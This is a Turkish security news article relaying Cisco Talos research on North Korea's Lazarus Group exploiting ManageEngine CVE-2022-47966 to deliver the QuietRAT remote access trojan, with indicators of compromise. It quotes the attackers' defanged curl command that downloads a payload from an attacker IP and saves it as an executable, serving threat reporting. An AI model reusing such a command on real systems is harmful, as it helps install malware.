Cisco Talos’a göre, Kuzey Kore tarafından desteklenen Lazarus Grubu, Avrupa ve ABD genelinde internetin omurga altyapısına ve sağlık sektöründeki kuruluşlara aktif olarak saldırıyor.
Bu etkinlik, bir yıldan kısa bir süre içindeki üçüncü kampanyalarına işaret ettiği için ne kadar aktif olduklarını ve aynı altyapıyı tutarlı bir şekilde kullandıklarını açıkça gösteriyor.
Yakın zamanda Cyber Security News ile paylaşılan bir raporda Cisco Talos’taki güvenlik analistleri, Kuzey Kore devlet destekli tehdit aktörü Lazarus Group’un MagicRAT kötü amaçlı yazılımını dağıtmak için ManageEngine kusurunu (CVE-2022-47966) aktif olarak kullandığını tespit etti ve doğruladı.
Lazarus Grubu ManageEngine Kusurundan Yararlanıyor
Avrupa’da Lazarus Group’un operatörleri, 2023’ün başlarında QuietRAT kötü amaçlı yazılımını dağıtmak için bir internet omurga altyapı sağlayıcısına saldırdı.
Araştırmacılar, tehdit aktörlerinin, QuitRAT ikili dosyasını hemen dağıtmak için kötü amaçlı bir URL’den cURL komutunu kullandığını gözlemledi: –
curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe
İndirilen ikili dosya Java aracılığıyla QuietRAT’ı tetikleyerek sunucuda etkinleştirir. Daha sonra sistem bilgilerini C2 sunucularına gönderir ve komutların alt cmd.exe aracılığıyla yürütülmesini bekler.
QuietRAT, GUI olmadan Qt kitaplıklarını kullanan basit bir RAT’tır (Uzaktan Erişim Truva Atı). Bunun yanı sıra, gömülü Qt kitaplıklarının kullanımı ve Grafik Kullanıcı Arayüzünün (GUI) olmaması, QuietRAT ve MagicRAT arasındaki iki temel benzerliktir.
Qt framework kullanımı gibi özellikleri göz önüne alındığında QuietRAT, MagicRAT ailesine bağlıdır. Ancak yeni bir kampanyanın açıklanması, QuietRAT dağıtımına yönelik ManageEngine ServiceDesk kusurunu (CVE-2022-47966) öne çıkarıyor.
Aşağıda, başarılı bir şekilde konuşlandırıldıktan sonra bu implantın topladığı tüm veri türlerinden bahsettik: –
- MAC adresleri
- IP adresleri
- Cihazın mevcut kullanıcı adı
Kötü amaçlı yazılım ayrıca C2 URL’lerini ve genişletilmiş URI parametrelerini içeren dizeleri XOR (0x78) ve base64 ile kodlayarak ağ ayarlarını da korur.
MagicRAT’ın en son sürümü, henüz bilinen en yeni sürüm olan Nisan 2022’de ortaya çıktı. Dolayısıyla, QuietRAT’ın Mayıs 2023’te ortaya çıkışı, oyuncunun daha küçük Qt tabanlı bir yaklaşıma geçiş yaptığını gösteriyor.
MagicRAT’ın bir evrimi olan QuietRAT, daha az Qt kitaplığı kullanarak, hacimli 18 MB MagicRAT’ın aksine 4-5 MB’a küçülür. MagicRAT’ın yerleşik kalıcılığının aksine, QuietRAT, C2 sunucu komutlarına dayanır.
Her ikisi de Qt köklerini, komut yürütmeyi, dize gizlemeyi ve uyku işlevselliğini paylaşıyor ve bu da QuietRAT’ın köklerini gösteriyor.
IOC’ler
Aşağıda tüm IOC’lerden bahsettik: –
Hash’ler
QuiteRAT: ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6
Ağ IOC’leri
146[.]4[.]21[.]94 hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php
Bizi Google Haberler, Linkedin’den takip ederek en son Siber Güvenlik Haberlerinden haberdar olun, heyecanve Facebook.